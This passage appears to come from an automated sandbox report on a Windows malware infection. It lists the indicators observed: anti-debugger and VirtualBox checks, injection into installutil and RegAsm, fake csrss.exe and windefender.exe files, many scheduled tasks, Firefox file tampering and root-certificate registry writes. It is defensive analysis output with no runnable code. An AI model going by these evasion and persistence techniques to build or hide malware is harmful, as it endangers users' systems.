C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZQqYSYc.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini fH6393mwgNgh1D0guCtDCA52.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ZQqYSYc.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exeexplorha.exeexplorha.exeamadka.exefH6393mwgNgh1D0guCtDCA52.exeexplorha.exeexplorha.exepid process 3948 bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe 1492 explorha.exe 3744 explorha.exe 5184 amadka.exe 5788 fH6393mwgNgh1D0guCtDCA52.exe 780 explorha.exe 6488 explorha.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
file300un.exeeazOqh4NuQfCeody6sSmmD8y.exe6558.exe6558.exedescription pid process target process PID 4496 set thread context of 1020 4496 file300un.exe installutil.exe PID 3460 set thread context of 5836 3460 eazOqh4NuQfCeody6sSmmD8y.exe RegAsm.exe PID 5688 set thread context of 3936 5688 6558.exe 6558.exe PID 4508 set thread context of 2732 4508 6558.exe 6558.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
XTiiAa1fPkJ3xiLY8hB760oY.exe4767d2e713f2021e8fe856e3ea638b58.exeWgtdfAK8BX6kdw8MwWOFnUAu.exeHAxnl42jKWN9YwHZHa2OAHww.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN XTiiAa1fPkJ3xiLY8hB760oY.exe File opened (read-only) \??\VBoxMiniRdrDN 4767d2e713f2021e8fe856e3ea638b58.exe File opened (read-only) \??\VBoxMiniRdrDN WgtdfAK8BX6kdw8MwWOFnUAu.exe File opened (read-only) \??\VBoxMiniRdrDN HAxnl42jKWN9YwHZHa2OAHww.exe -
Drops file in Program Files directory 14 IoCs
Processes:
ZQqYSYc.exedescription ioc process File created C:\Program Files (x86)\gbPxNkbXHfUn\LtDaTLm.dll ZQqYSYc.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ZQqYSYc.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZQqYSYc.exe File created C:\Program Files (x86)\LCifMpYymZWU2\BxqUtce.xml ZQqYSYc.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\wptboXB.xml ZQqYSYc.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ZQqYSYc.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZQqYSYc.exe File created C:\Program Files (x86)\yvWovCiVU\turCmMd.xml ZQqYSYc.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ZQqYSYc.exe File created C:\Program Files (x86)\LCifMpYymZWU2\NtRQfZuLwnXaY.dll ZQqYSYc.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\xUJOSxy.dll ZQqYSYc.exe File created C:\Program Files (x86)\yvWovCiVU\tQZLna.dll ZQqYSYc.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\QJWoTPl.dll ZQqYSYc.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\bYFLPDi.xml ZQqYSYc.exe -
Drops file in Windows directory 16 IoCs
Processes:
bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe4767d2e713f2021e8fe856e3ea638b58.exeWgtdfAK8BX6kdw8MwWOFnUAu.exeschtasks.exeXTiiAa1fPkJ3xiLY8hB760oY.exeHAxnl42jKWN9YwHZHa2OAHww.execsrss.exeschtasks.exeschtasks.exelumma21.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\explorha.job bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe File created C:\Windows\rss\csrss.exe 4767d2e713f2021e8fe856e3ea638b58.exe File created C:\Windows\rss\csrss.exe WgtdfAK8BX6kdw8MwWOFnUAu.exe File created C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job schtasks.exe File opened for modification C:\Windows\rss 4767d2e713f2021e8fe856e3ea638b58.exe File created C:\Windows\rss\csrss.exe XTiiAa1fPkJ3xiLY8hB760oY.exe File opened for modification C:\Windows\rss HAxnl42jKWN9YwHZHa2OAHww.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\FTXCzbcEvROqagNdd.job schtasks.exe File created C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job schtasks.exe File created C:\Windows\Tasks\chrosha.job lumma21.exe File created C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job schtasks.exe File opened for modification C:\Windows\rss XTiiAa1fPkJ3xiLY8hB760oY.exe File opened for modification C:\Windows\rss WgtdfAK8BX6kdw8MwWOFnUAu.exe File created C:\Windows\rss\csrss.exe HAxnl42jKWN9YwHZHa2OAHww.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 5716 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3460 4964 WerFault.exe ISetup8.exe 5640 2280 WerFault.exe 9tffILNsblfrBiKalVXQOm4E.exe 5772 5836 WerFault.exe RegAsm.exe 5440 5836 WerFault.exe RegAsm.exe 6048 568 WerFault.exe NDETJa6sPxmbP4JlULJ9hFAT.exe 7152 4668 WerFault.exe u3tw.0.exe 6296 5260 WerFault.exe ufs.0.exe 6192 6004 WerFault.exe u1rc.0.exe 1348 2732 WerFault.exe 6558.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
toolspub1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u3tw.0.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u3tw.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u3tw.0.exe -
Creates scheduled task(s) 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4028 schtasks.exe 6060 schtasks.exe 6872 schtasks.exe 6104 schtasks.exe 436 schtasks.exe 5496 schtasks.exe 3504 schtasks.exe 6388 schtasks.exe 3948 schtasks.exe 4440 schtasks.exe 3808 schtasks.exe 5216 schtasks.exe 5396 schtasks.exe 5772 schtasks.exe 3836 schtasks.exe 5504 schtasks.exe 4448 schtasks.exe 5904 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exewindefender.exeXTiiAa1fPkJ3xiLY8hB760oY.exepowershell.exepowershell.exepowershell.exerundll32.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" XTiiAa1fPkJ3xiLY8hB760oY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" XTiiAa1fPkJ3xiLY8hB760oY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" XTiiAa1fPkJ3xiLY8hB760oY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-572 = "China Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" XTiiAa1fPkJ3xiLY8hB760oY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" XTiiAa1fPkJ3xiLY8hB760oY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" XTiiAa1fPkJ3xiLY8hB760oY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" XTiiAa1fPkJ3xiLY8hB760oY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" XTiiAa1fPkJ3xiLY8hB760oY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" XTiiAa1fPkJ3xiLY8hB760oY.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" XTiiAa1fPkJ3xiLY8hB760oY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" XTiiAa1fPkJ3xiLY8hB760oY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" XTiiAa1fPkJ3xiLY8hB760oY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2431 = "Cuba Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2892 = "Sudan Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time" windefender.exe -
Processes:
CYoOmU856pwWKZXiUIbstHLU.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 CYoOmU856pwWKZXiUIbstHLU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e CYoOmU856pwWKZXiUIbstHLU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e CYoOmU856pwWKZXiUIbstHLU.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exeexplorha.exerundll32.exepowershell.exeexplorha.exetoolspub1.exepowershell.exeu3tw.0.exeamadka.exepid process 3948 bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe 3948 bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe 1492 explorha.exe 1492 explorha.exe 1304 rundll32.exe 1304 rundll32.exe 1304 rundll32.exe 1304 rundll32.exe 1304 rundll32.exe 1304 rundll32.exe 1304 rundll32.exe 1304 rundll32.exe 1304 rundll32.exe 1304 rundll32.exe 4756 powershell.exe 4756 powershell.exe 4756 powershell.exe 3744 explorha.exe 3744 explorha.exe 4900 toolspub1.exe 4900 toolspub1.exe 2604 powershell.exe 2604 powershell.exe 2604 powershell.exe 4668 u3tw.0.exe 4668 u3tw.0.exe 5184 amadka.exe 5184 amadka.exe 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
toolspub1.exepid process 4900 toolspub1.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
